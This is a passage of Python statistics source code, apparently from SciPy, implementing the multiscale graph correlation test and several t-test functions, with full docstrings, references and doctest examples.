The approximated null distribution.
"""
# generate seeds for each rep (change to new parallel random number
# capabilities in numpy >= 1.17+)
random_state = check_random_state(random_state)
random_states = [np.random.RandomState(rng_integers(random_state, 1 << 32,
size=4, dtype=np.uint32)) for _ in range(reps)]
# parallelizes with specified workers over number of reps and set seeds
parallelp = _ParallelP(x=x, y=y, random_states=random_states)
with MapWrapper(workers) as mapwrapper:
null_dist = np.array(list(mapwrapper(parallelp, range(reps))))
# calculate p-value and significant permutation map through list
pvalue = (null_dist >= stat).sum() / reps
# correct for a p-value of 0. This is because, with bootstrapping
# permutations, a p-value of 0 is incorrect
if pvalue == 0:
pvalue = 1 / reps
return pvalue, null_dist
def _euclidean_dist(x):
return cdist(x, x)
MGCResult = namedtuple('MGCResult', ('stat', 'pvalue', 'mgc_dict'))
def multiscale_graphcorr(x, y, compute_distance=_euclidean_dist, reps=1000,
workers=1, is_twosamp=False, random_state=None):
r"""Computes the Multiscale Graph Correlation (MGC) test statistic.
Specifically, for each point, MGC finds the :math:`k`-nearest neighbors for
one property (e.g. cloud density), and the :math:`l`-nearest neighbors for
the other property (e.g. grass wetness) [1]_. This pair :math:`(k, l)` is
called the "scale". A priori, however, it is not know which scales will be
most informative. So, MGC computes all distance pairs, and then efficiently
computes the distance correlations for all scales. The local correlations
illustrate which scales are relatively informative about the relationship.
The key, therefore, to successfully discover and decipher relationships
between disparate data modalities is to adaptively determine which scales
are the most informative, and the geometric implication for the most
informative scales. Doing so not only provides an estimate of whether the
modalities are related, but also provides insight into how the
determination was made. This is especially important in high-dimensional
data, where simple visualizations do not reveal relationships to the
unaided human eye. Characterizations of this implementation in particular
have been derived from and benchmarked within in [2]_.
Parameters
----------
x, y : ndarray
If ``x`` and ``y`` have shapes ``(n, p)`` and ``(n, q)`` where `n` is
the number of samples and `p` and `q` are the number of dimensions,
then the MGC independence test will be run. Alternatively, ``x`` and
``y`` can have shapes ``(n, n)`` if they are distance or similarity
matrices, and ``compute_distance`` must be sent to ``None``. If ``x``
and ``y`` have shapes ``(n, p)`` and ``(m, p)``, an unpaired
two-sample MGC test will be run.
compute_distance : callable, optional
A function that computes the distance or similarity among the samples
within each data matrix. Set to ``None`` if ``x`` and ``y`` are
already distance matrices. The default uses the euclidean norm metric.
If you are calling a custom function, either create the distance
matrix before-hand or create a function of the form
``compute_distance(x)`` where `x` is the data matrix for which
pairwise distances are calculated.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is ``1000``.
workers : int or map-like callable, optional
If ``workers`` is an int the population is subdivided into ``workers``
sections and evaluated in parallel (uses ``multiprocessing.Pool
<multiprocessing>``). Supply ``-1`` to use all cores available to the
Process. Alternatively supply a map-like callable, such as
``multiprocessing.Pool.map`` for evaluating the p-value in parallel.
This evaluation is carried out as ``workers(func, iterable)``.
Requires that `func` be pickleable. The default is ``1``.
is_twosamp : bool, optional
If `True`, a two sample test will be run. If ``x`` and ``y`` have
shapes ``(n, p)`` and ``(m, p)``, this optional will be overridden and
set to ``True``. Set to ``True`` if ``x`` and ``y`` both have shapes
``(n, p)`` and a two sample test is desired. The default is ``False``.
Note that this will not run if inputs are distance matrices.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
If `seed` is None (or `np.random`), the `numpy.random.RandomState`
singleton is used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` or ``RandomState`` instance then
that instance is used.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
pvalue : float
The p-value obtained via permutation.
mgc_dict : dict
Contains additional useful additional returns containing the following
keys:
- mgc_map : ndarray
A 2D representation of the latent geometry of the relationship.
of the relationship.
- opt_scale : (int, int)
The estimated optimal scale as a `(x, y)` pair.
- null_dist : list
The null distribution derived from the permuted matrices
See Also
--------
pearsonr : Pearson correlation coefficient and p-value for testing
non-correlation.
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
Notes
-----
A description of the process of MGC and applications on neuroscience data
can be found in [1]_. It is performed using the following steps:
#. Two distance matrices :math:`D^X` and :math:`D^Y` are computed and
modified to be mean zero columnwise. This results in two
:math:`n \times n` distance matrices :math:`A` and :math:`B` (the
centering and unbiased modification) [3]_.
#. For all values :math:`k` and :math:`l` from :math:`1, ..., n`,
* The :math:`k`-nearest neighbor and :math:`l`-nearest neighbor graphs
are calculated for each property. Here, :math:`G_k (i, j)` indicates
the :math:`k`-smallest values of the :math:`i`-th row of :math:`A`
and :math:`H_l (i, j)` indicates the :math:`l` smallested values of
the :math:`i`-th row of :math:`B`
* Let :math:`\circ` denotes the entry-wise matrix product, then local
correlations are summed and normalized using the following statistic:
.. math::
c^{kl} = \frac{\sum_{ij} A G_k B H_l}
{\sqrt{\sum_{ij} A^2 G_k \times \sum_{ij} B^2 H_l}}
#. The MGC test statistic is the smoothed optimal local correlation of
:math:`\{ c^{kl} \}`. Denote the smoothing operation as :math:`R(\cdot)`
(which essentially set all isolated large correlations) as 0 and
connected large correlations the same as before, see [3]_.) MGC is,
.. math::
MGC_n (x, y) = \max_{(k, l)} R \left(c^{kl} \left( x_n, y_n \right)
\right)
The test statistic returns a value between :math:`(-1, 1)` since it is
normalized.
The p-value returned is calculated using a permutation test. This process
is completed by first randomly permuting :math:`y` to estimate the null
distribution and then calculating the probability of observing a test
statistic, under the null, at least as extreme as the observed test
statistic.
MGC requires at least 5 samples to run with reliable results. It can also
handle high-dimensional data sets.
In addition, by manipulating the input data matrices, the two-sample
testing problem can be reduced to the independence testing problem [4]_.
Given sample data :math:`U` and :math:`V` of sizes :math:`p \times n`
:math:`p \times m`, data matrix :math:`X` and :math:`Y` can be created as
follows:
.. math::
X = [U | V] \in \mathcal{R}^{p \times (n + m)}
Y = [0_{1 \times n} | 1_{1 \times m}] \in \mathcal{R}^{(n + m)}
Then, the MGC statistic can be calculated as normal. This methodology can
be extended to similar tests such as distance correlation [4]_.
.. versionadded:: 1.4.0
References
----------
.. [1] Vogelstein, J. T., Bridgeford, E. W., Wang, Q., Priebe, C. E.,
Maggioni, M., & Shen, C. (2019). Discovering and deciphering
relationships across disparate data modalities. ELife.
.. [2] Panda, S., Palaniappan, S., Xiong, J., Swaminathan, A.,
Ramachandran, S., Bridgeford, E. W., ... Vogelstein, J. T. (2019).
mgcpy: A Comprehensive High Dimensional Independence Testing Python
Package. :arXiv:`1907.02088`
.. [3] Shen, C., Priebe, C.E., & Vogelstein, J. T. (2019). From distance
correlation to multiscale graph correlation. Journal of the American
Statistical Association.
.. [4] Shen, C. & Vogelstein, J. T. (2018). The Exact Equivalence of
Distance and Kernel Methods for Hypothesis Testing.
:arXiv:`1806.05514`
Examples
--------
>>> from scipy.stats import multiscale_graphcorr
>>> x = np.arange(100)
>>> y = x
>>> stat, pvalue, _ = multiscale_graphcorr(x, y, workers=-1)
>>> '%.1f, %.3f' % (stat, pvalue)
'1.0, 0.001'
Alternatively,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y)
>>> '%.1f, %.3f' % (mgc.stat, mgc.pvalue)
'1.0, 0.001'
To run an unpaired two-sample test,
>>> x = np.arange(100)
>>> y = np.arange(79)
>>> mgc = multiscale_graphcorr(x, y)
>>> '%.3f, %.2f' % (mgc.stat, mgc.pvalue) # doctest: +SKIP
'0.033, 0.02'
or, if shape of the inputs are the same,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y, is_twosamp=True)
>>> '%.3f, %.1f' % (mgc.stat, mgc.pvalue) # doctest: +SKIP
'-0.008, 1.0'
"""
if not isinstance(x, np.ndarray) or not isinstance(y, np.ndarray):
raise ValueError("x and y must be ndarrays")
# convert arrays of type (n,) to (n, 1)
if x.ndim == 1:
x = x[:, np.newaxis]
elif x.ndim != 2:
raise ValueError("Expected a 2-D array `x`, found shape "
"{}".format(x.shape))
if y.ndim == 1:
y = y[:, np.newaxis]
elif y.ndim != 2:
raise ValueError("Expected a 2-D array `y`, found shape "
"{}".format(y.shape))
nx, px = x.shape
ny, py = y.shape
# check for NaNs
_contains_nan(x, nan_policy='raise')
_contains_nan(y, nan_policy='raise')
# check for positive or negative infinity and raise error
if np.sum(np.isinf(x)) > 0 or np.sum(np.isinf(y)) > 0:
raise ValueError("Inputs contain infinities")
if nx != ny:
if px == py:
# reshape x and y for two sample testing
is_twosamp = True
else:
raise ValueError("Shape mismatch, x and y must have shape [n, p] "
"and [n, q] or have shape [n, p] and [m, p].")
if nx < 5 or ny < 5:
raise ValueError("MGC requires at least 5 samples to give reasonable "
"results.")
# convert x and y to float
x = x.astype(np.float64)
y = y.astype(np.float64)
# check if compute_distance_matrix if a callable()
if not callable(compute_distance) and compute_distance is not None:
raise ValueError("Compute_distance must be a function.")
# check if number of reps exists, integer, or > 0 (if under 1000 raises
# warning)
if not isinstance(reps, int) or reps < 0:
raise ValueError("Number of reps must be an integer greater than 0.")
elif reps < 1000:
msg = ("The number of replications is low (under 1000), and p-value "
"calculations may be unreliable. Use the p-value result, with "
"caution!")
warnings.warn(msg, RuntimeWarning)
if is_twosamp:
if compute_distance is None:
raise ValueError("Cannot run if inputs are distance matrices")
x, y = _two_sample_transform(x, y)
if compute_distance is not None:
# compute distance matrices for x and y
x = compute_distance(x)
y = compute_distance(y)
# calculate MGC stat
stat, stat_dict = _mgc_stat(x, y)
stat_mgc_map = stat_dict["stat_mgc_map"]
opt_scale = stat_dict["opt_scale"]
# calculate permutation MGC p-value
pvalue, null_dist = _perm_test(x, y, stat, reps=reps, workers=workers,
random_state=random_state)
# save all stats (other than stat/p-value) in dictionary
mgc_dict = {"mgc_map": stat_mgc_map,
"opt_scale": opt_scale,
"null_dist": null_dist}
return MGCResult(stat, pvalue, mgc_dict)
def _mgc_stat(distx, disty):
r"""Helper function that calculates the MGC stat. See above for use.
Parameters
----------
distx, disty : ndarray
`distx` and `disty` have shapes `(n, p)` and `(n, q)` or
`(n, n)` and `(n, n)`
if distance matrices.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
stat_dict : dict
Contains additional useful additional returns containing the following
keys:
- stat_mgc_map : ndarray
MGC-map of the statistics.
- opt_scale : (float, float)
The estimated optimal scale as a `(x, y)` pair.
"""
# calculate MGC map and optimal scale
stat_mgc_map = _local_correlations(distx, disty, global_corr='mgc')
n, m = stat_mgc_map.shape
if m == 1 or n == 1:
# the global scale at is the statistic calculated at maximial nearest
# neighbors. There is not enough local scale to search over, so
# default to global scale
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = m * n
else:
samp_size = len(distx) - 1
# threshold to find connected region of significant local correlations
sig_connect = _threshold_mgc_map(stat_mgc_map, samp_size)
# maximum within the significant region
stat, opt_scale = _smooth_mgc_map(sig_connect, stat_mgc_map)
stat_dict = {"stat_mgc_map": stat_mgc_map,
"opt_scale": opt_scale}
return stat, stat_dict
def _threshold_mgc_map(stat_mgc_map, samp_size):
r"""
Finds a connected region of significance in the MGC-map by thresholding.
Parameters
----------
stat_mgc_map : ndarray
All local correlations within `[-1,1]`.
samp_size : int
The sample size of original data.
Returns
-------
sig_connect : ndarray
A binary matrix with 1's indicating the significant region.
"""
m, n = stat_mgc_map.shape
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance. Threshold is based on a beta
# approximation.
per_sig = 1 - (0.02 / samp_size) # Percentile to consider as significant
threshold = samp_size * (samp_size - 3)/4 - 1/2 # Beta approximation
threshold = distributions.beta.ppf(per_sig, threshold, threshold) * 2 - 1
# the global scale at is the statistic calculated at maximial nearest
# neighbors. Threshold is the maximum on the global and local scales
threshold = max(threshold, stat_mgc_map[m - 1][n - 1])
# find the largest connected component of significant correlations
sig_connect = stat_mgc_map > threshold
if np.sum(sig_connect) > 0:
sig_connect, _ = _measurements.label(sig_connect)
_, label_counts = np.unique(sig_connect, return_counts=True)
# skip the first element in label_counts, as it is count(zeros)
max_label = np.argmax(label_counts[1:]) + 1
sig_connect = sig_connect == max_label
else:
sig_connect = np.array([[False]])
return sig_connect
def _smooth_mgc_map(sig_connect, stat_mgc_map):
"""Finds the smoothed maximal within the significant region R.
If area of R is too small it returns the last local correlation. Otherwise,
returns the maximum within significant_connected_region.
Parameters
----------
sig_connect : ndarray
A binary matrix with 1's indicating the significant region.
stat_mgc_map : ndarray
All local correlations within `[-1, 1]`.
Returns
-------
stat : float
The sample MGC statistic within `[-1, 1]`.
opt_scale: (float, float)
The estimated optimal scale as an `(x, y)` pair.
"""
m, n = stat_mgc_map.shape
# the global scale at is the statistic calculated at maximial nearest
# neighbors. By default, statistic and optimal scale are global.
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = [m, n]
if np.linalg.norm(sig_connect) != 0:
# proceed only when the connected region's area is sufficiently large
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance
if np.sum(sig_connect) >= np.ceil(0.02 * max(m, n)) * min(m, n):
max_corr = max(stat_mgc_map[sig_connect])
# find all scales within significant_connected_region that maximize
# the local correlation
max_corr_index = np.where((stat_mgc_map >= max_corr) & sig_connect)
if max_corr >= stat:
stat = max_corr
k, l = max_corr_index
one_d_indices = k * n + l # 2D to 1D indexing
k = np.max(one_d_indices) // n
l = np.max(one_d_indices) % n
opt_scale = [k+1, l+1] # adding 1s to match R indexing
return stat, opt_scale
def _two_sample_transform(u, v):
"""Helper function that concatenates x and y for two sample MGC stat.
See above for use.
Parameters
----------
u, v : ndarray
`u` and `v` have shapes `(n, p)` and `(m, p)`.
Returns
-------
x : ndarray
Concatenate `u` and `v` along the `axis = 0`. `x` thus has shape
`(2n, p)`.
y : ndarray
Label matrix for `x` where 0 refers to samples that comes from `u` and
1 refers to samples that come from `v`. `y` thus has shape `(2n, 1)`.
"""
nx = u.shape[0]
ny = v.shape[0]
x = np.concatenate([u, v], axis=0)
y = np.concatenate([np.zeros(nx), np.ones(ny)], axis=0).reshape(-1, 1)
return x, y
#####################################
# INFERENTIAL STATISTICS #
#####################################
Ttest_1sampResult = namedtuple('Ttest_1sampResult', ('statistic', 'pvalue'))
def ttest_1samp(a, popmean, axis=0, nan_policy='propagate',
alternative="two-sided"):
"""Calculate the T-test for the mean of ONE group of scores.
This is a test for the null hypothesis that the expected value
(mean) of a sample of independent observations `a` is equal to the given
population mean, `popmean`.
Parameters
----------
a : array_like
Sample observation.
popmean : float or array_like
Expected value in null hypothesis. If array_like, then it must have the
same shape as `a` excluding the axis dimension.
axis : int or None, optional
Axis along which to compute test; default is 0. If None, compute over
the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the mean of the underlying distribution of the sample
is different than the given population mean (`popmean`)
* 'less': the mean of the underlying distribution of the sample is
less than the given population mean (`popmean`)
* 'greater': the mean of the underlying distribution of the sample is
greater than the given population mean (`popmean`)
.. versionadded:: 1.6.0
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
Two-sided p-value.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> rvs = stats.norm.rvs(loc=5, scale=10, size=(50, 2), random_state=rng)
Test if mean of random sample is equal to true mean, and different mean.
We reject the null hypothesis in the second case and don't reject it in
the first case.
>>> stats.ttest_1samp(rvs, 5.0)
Ttest_1sampResult(statistic=array([-2.09794637, -1.75977004]), pvalue=array([0.04108952, 0.08468867]))
>>> stats.ttest_1samp(rvs, 0.0)
Ttest_1sampResult(statistic=array([1.64495065, 1.62095307]), pvalue=array([0.10638103, 0.11144602]))
Examples using axis and non-scalar dimension for population mean.
>>> result = stats.ttest_1samp(rvs, [5.0, 0.0])
>>> result.statistic
array([-2.09794637, 1.62095307])
>>> result.pvalue
array([0.04108952, 0.11144602])
>>> result = stats.ttest_1samp(rvs.T, [5.0, 0.0], axis=1)
>>> result.statistic
array([-2.09794637, 1.62095307])
>>> result.pvalue
array([0.04108952, 0.11144602])
>>> result = stats.ttest_1samp(rvs, [[5.0], [0.0]])
>>> result.statistic
array([[-2.09794637, -1.75977004],
[ 1.64495065, 1.62095307]])
>>> result.pvalue
array([[0.04108952, 0.08468867],
[0.10638103, 0.11144602]])
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.ttest_1samp(a, popmean, axis, alternative)
n = a.shape[axis]
df = n - 1
d = np.mean(a, axis) - popmean
v = np.var(a, axis, ddof=1)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t, alternative)
return Ttest_1sampResult(t, prob)
def _ttest_finish(df, t, alternative):
"""Common code between all 3 t-test functions."""
# We use ``stdtr`` directly here as it handles the case when ``nan``
# values are present in the data and masked arrays are passed
# while ``t.cdf`` emits runtime warnings. This way ``_ttest_finish``
# can be shared between the ``stats`` and ``mstats`` versions.
if alternative == 'less':
pval = special.stdtr(df, t)
elif alternative == 'greater':
pval = special.stdtr(df, -t)
elif alternative == 'two-sided':
pval = special.stdtr(df, -np.abs(t))*2
else:
raise ValueError("alternative must be "
"'less', 'greater' or 'two-sided'")
if t.ndim == 0:
t = t[()]
if pval.ndim == 0:
pval = pval[()]
return t, pval
def _ttest_ind_from_stats(mean1, mean2, denom, df, alternative):
d = mean1 - mean2
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t, alternative)
return (t, prob)
def _unequal_var_ttest_denom(v1, n1, v2, n2):
vn1 = v1 / n1
vn2 = v2 / n2
with np.errstate(divide='ignore', invalid='ignore'):
df = (vn1 + vn2)**2 / (vn1**2 / (n1 - 1) + vn2**2 / (n2 - 1))
# If df is undefined, variances are zero (assumes n1 > 0 & n2 > 0).
# Hence it doesn't matter what df is as long as it's not NaN.
df = np.where(np.isnan(df), 1, df)
denom = np.sqrt(vn1 + vn2)
return df, denom
def _equal_var_ttest_denom(v1, n1, v2, n2):
df = n1 + n2 - 2.0
svar = ((n1 - 1) * v1 + (n2 - 1) * v2) / df
denom = np.sqrt(svar * (1.0 / n1 + 1.0 / n2))
return df, denom
Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
def ttest_ind_from_stats(mean1, std1, nobs1, mean2, std2, nobs2,
equal_var=True, alternative="two-sided"):
r"""
T-test for means of two independent samples from descriptive statistics.
This is a test for the null hypothesis that two independent
samples have identical average (expected) values.
Parameters
----------
mean1 : array_like
The mean(s) of sample 1.
std1 : array_like
The standard deviation(s) of sample 1.
nobs1 : array_like
The number(s) of observations of sample 1.
mean2 : array_like
The mean(s) of sample 2.
std2 : array_like
The standard deviations(s) of sample 2.
nobs2 : array_like
The number(s) of observations of sample 2.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the means of the distributions are unequal.
* 'less': the mean of the first distribution is less than the
mean of the second distribution.
* 'greater': the mean of the first distribution is greater than the
mean of the second distribution.
.. versionadded:: 1.6.0
Returns
-------
statistic : float or array
The calculated t-statistics.
pvalue : float or array
The two-tailed p-value.
See Also
--------
scipy.stats.ttest_ind
Notes
-----
.. versionadded:: 0.16.0
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
Examples
--------
Suppose we have the summary data for two samples, as follows::
Sample Sample
Size Mean Variance
Sample 1 13 15.0 87.5
Sample 2 11 12.0 39.0
Apply the t-test to this data (with the assumption that the population
variances are equal):
>>> from scipy.stats import ttest_ind_from_stats
>>> ttest_ind_from_stats(mean1=15.0, std1=np.sqrt(87.5), nobs1=13,
... mean2=12.0, std2=np.sqrt(39.0), nobs2=11)
Ttest_indResult(statistic=0.9051358093310269, pvalue=0.3751996797581487)
For comparison, here is the data from which those summary statistics
were taken. With this data, we can compute the same result using
`scipy.stats.ttest_ind`:
>>> a = np.array([1, 3, 4, 6, 11, 13, 15, 19, 22, 24, 25, 26, 26])
>>> b = np.array([2, 4, 6, 9, 11, 13, 14, 15, 18, 19, 21])
>>> from scipy.stats import ttest_ind
>>> ttest_ind(a, b)
Ttest_indResult(statistic=0.905135809331027, pvalue=0.3751996797581486)
Suppose we instead have binary data and would like to apply a t-test to
compare the proportion of 1s in two independent groups::
Number of Sample Sample
Size ones Mean Variance
Sample 1 150 30 0.2 0.16
Sample 2 200 45 0.225 0.174375
The sample mean :math:`\hat{p}` is the proportion of ones in the sample
and the variance for a binary observation is estimated by
:math:`\hat{p}(1-\hat{p})`.
>>> ttest_ind_from_stats(mean1=0.2, std1=np.sqrt(0.16), nobs1=150,
... mean2=0.225, std2=np.sqrt(0.17437), nobs2=200)
Ttest_indResult(statistic=-0.564327545549774, pvalue=0.5728947691244874)
For comparison, we could compute the t statistic and p-value using
arrays of 0s and 1s and `scipy.stat.ttest_ind`, as above.
>>> group1 = np.array([1]*30 + [0]*(150-30))
>>> group2 = np.array([1]*45 + [0]*(200-45))
>>> ttest_ind(group1, group2)
Ttest_indResult(statistic=-0.5627179589855622, pvalue=0.573989277115258)
"""
mean1 = np.asarray(mean1)
std1 = np.asarray(std1)
mean2 = np.asarray(mean2)
std2 = np.asarray(std2)
if equal_var:
df, denom = _equal_var_ttest_denom(std1**2, nobs1, std2**2, nobs2)
else:
df, denom = _unequal_var_ttest_denom(std1**2, nobs1,
std2**2, nobs2)
res = _ttest_ind_from_stats(mean1, mean2, denom, df, alternative)
return Ttest_indResult(*res)
def _ttest_nans(a, b, axis, namedtuple_type):
"""
Generate an array of `nan`, with shape determined by `a`, `b` and `axis`.
This function is used by ttest_ind and ttest_rel to create the return
value when one of the inputs has size 0.
The shapes of the arrays are determined by dropping `axis` from the
shapes of `a` and `b` and broadcasting what is left.
The return value is a named tuple of the type given in `namedtuple_type`.
Examples
--------
>>> a = np.zeros((9, 2))
>>> b = np.zeros((5, 1))
>>> _ttest_nans(a, b, 0, Ttest_indResult)
Ttest_indResult(statistic=array([nan, nan]), pvalue=array([nan, nan]))
>>> a = np.zeros((3, 0, 9))
>>> b = np.zeros((1, 10))
>>> stat, p = _ttest_nans(a, b, -1, Ttest_indResult)
>>> stat
array([], shape=(3, 0), dtype=float64)
>>> p
array([], shape=(3, 0), dtype=float64)
>>> a = np.zeros(10)
>>> b = np.zeros(7)
>>> _ttest_nans(a, b, 0, Ttest_indResult)
Ttest_indResult(statistic=nan, pvalue=nan)
"""
shp = _broadcast_shapes_with_dropped_axis(a, b, axis)
if len(shp) == 0:
t = np.nan
p = np.nan
else:
t = np.full(shp, fill_value=np.nan)
p = t.copy()
return namedtuple_type(t, p)
def ttest_ind(a, b, axis=0, equal_var=True, nan_policy='propagate',
permutations=None, random_state=None, alternative="two-sided",
trim=0):
"""
Calculate the T-test for the means of *two independent* samples of scores.
This is a test for the null hypothesis that 2 independent samples
have identical average (expected) values. This test assumes that the
populations have identical variances by default.
Parameters
----------
a, b : array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
.. versionadded:: 0.11.0
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
The 'omit' option is not currently available for permutation tests or
one-sided asympyotic tests.
permutations : non-negative int, np.inf, or None (default), optional
If 0 or None (default), use the t-distribution to calculate p-values.
Otherwise, `permutations` is the number of random permutations that
will be used to estimate p-values using a permutation test. If
`permutations` equals or exceeds the number of distinct partitions of
the pooled data, an exact test is performed instead (i.e. each
distinct partition is used exactly once). See Notes for details.
.. versionadded:: 1.7.0
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
If `seed` is None (or `np.random`), the `numpy.random.RandomState`
singleton is used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` or ``RandomState`` instance then
that instance is used.
Pseudorandom number generator state used to generate permutations
(used only when `permutations` is not None).
.. versionadded:: 1.7.0
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the means of the distributions underlying the samples
are unequal.
* 'less': the mean of the distribution underlying the first sample
is less than the mean of the distribution underlying the second
sample.
* 'greater': the mean of the distribution underlying the first
sample is greater than the mean of the distribution underlying
the second sample.
.. versionadded:: 1.6.0
trim : float, optional
If nonzero, performs a trimmed (Yuen's) t-test.
Defines the fraction of elements to be trimmed from each end of the
input samples. If 0 (default), no elements will be trimmed from either
side. The number of trimmed elements from each tail is the floor of the
trim times the number of elements. Valid range is [0, .5).
.. versionadded:: 1.7
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The p-value.
Notes
-----
Suppose we observe two independent samples, e.g. flower petal lengths, and
we are considering whether the two samples were drawn from the same
population (e.g. the same species of flower or two species with similar
petal characteristics) or two different populations.
The t-test quantifies the difference between the arithmetic means
of the two samples. The p-value quantifies the probability of observing
as or more extreme values assuming the null hypothesis, that the
samples are drawn from populations with the same population means, is true.
A p-value larger than a chosen threshold (e.g. 5% or 1%) indicates that
our observation is not so unlikely to have occurred by chance. Therefore,
we do not reject the null hypothesis of equal population means.
If the p-value is smaller than our threshold, then we have evidence
against the null hypothesis of equal population means.
By default, the p-value is determined by comparing the t-statistic of the
observed data against a theoretical t-distribution.
When ``1 < permutations < binom(n, k)``, where
* ``k`` is the number of observations in `a`,
* ``n`` is the total number of observations in `a` and `b`, and
* ``binom(n, k)`` is the binomial coefficient (``n`` choose ``k``),
the data are pooled (concatenated), randomly assigned to either group `a`
or `b`, and the t-statistic is calculated. This process is performed
repeatedly (`permutation` times), generating a distribution of the
t-statistic under the null hypothesis, and the t-statistic of the observed
data is compared to this distribution to determine the p-value. When
``permutations >= binom(n, k)``, an exact test is performed: the data are
partitioned between the groups in each distinct way exactly once.
The permutation test can be computationally expensive and not necessarily
more accurate than the analytical test, but it does not make strong
assumptions about the shape of the underlying distribution.
Use of trimming is commonly referred to as the trimmed t-test. At times
called Yuen's t-test, this is an extension of Welch's t-test, with the
difference being the use of winsorized means in calculation of the variance
and the trimmed sample size in calculation of the statistic. Trimming is
recommended if the underlying distribution is long-tailed or contaminated
with outliers [4]_.
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
.. [3] http://en.wikipedia.org/wiki/Resampling_%28statistics%29
.. [4] Yuen, Karen K. "The Two-Sample Trimmed t for Unequal Population
Variances." Biometrika, vol. 61, no. 1, 1974, pp. 165-170. JSTOR,
www.jstor.org/stable/2334299. Accessed 30 Mar. 2021.
.. [5] Yuen, Karen K., and W. J. Dixon. "The Approximate Behaviour and
Performance of the Two-Sample Trimmed t." Biometrika, vol. 60,
no. 2, 1973, pp. 369-374. JSTOR, www.jstor.org/stable/2334550.
Accessed 30 Mar. 2021.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
Test with sample with identical means:
>>> rvs1 = stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
>>> rvs2 = stats.norm.rvs(loc=5, scale=10, size=500, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs2)
Ttest_indResult(statistic=-0.4390847099199348, pvalue=0.6606952038870015)
>>> stats.ttest_ind(rvs1, rvs2, equal_var=False)
Ttest_indResult(statistic=-0.4390847099199348, pvalue=0.6606952553131064)
`ttest_ind` underestimates p for unequal variances:
>>> rvs3 = stats.norm.rvs(loc=5, scale=20, size=500, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs3)
Ttest_indResult(statistic=-1.6370984482905417, pvalue=0.1019251574705033)
>>> stats.ttest_ind(rvs1, rvs3, equal_var=False)
Ttest_indResult(statistic=-1.637098448290542, pvalue=0.10202110497954867)
When ``n1 != n2``, the equal variance t-statistic is no longer equal to the
unequal variance t-statistic:
>>> rvs4 = stats.norm.rvs(loc=5, scale=20, size=100, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs4)
Ttest_indResult(statistic=-1.9481646859513422, pvalue=0.05186270935842703)
>>> stats.ttest_ind(rvs1, rvs4, equal_var=False)
Ttest_indResult(statistic=-1.3146566100751664, pvalue=0.1913495266513811)
T-test with different means, variance, and n:
>>> rvs5 = stats.norm.rvs(loc=8, scale=20, size=100, random_state=rng)
>>> stats.ttest_ind(rvs1, rvs5)
Ttest_indResult(statistic=-2.8415950600298774, pvalue=0.0046418707568707885)
>>> stats.ttest_ind(rvs1, rvs5, equal_var=False)
Ttest_indResult(statistic=-1.8686598649188084, pvalue=0.06434714193919686)
When performing a permutation test, more permutations typically yields
more accurate results. Use a ``np.random.Generator`` to ensure
reproducibility:
>>> stats.ttest_ind(rvs1, rvs5, permutations=10000,
... random_state=rng)
Ttest_indResult(statistic=-2.8415950600298774, pvalue=0.0052)
Take these two samples, one of which has an extreme tail.
>>> a = (56, 128.6, 12, 123.8, 64.34, 78, 763.3)
>>> b = (1.1, 2.9, 4.2)
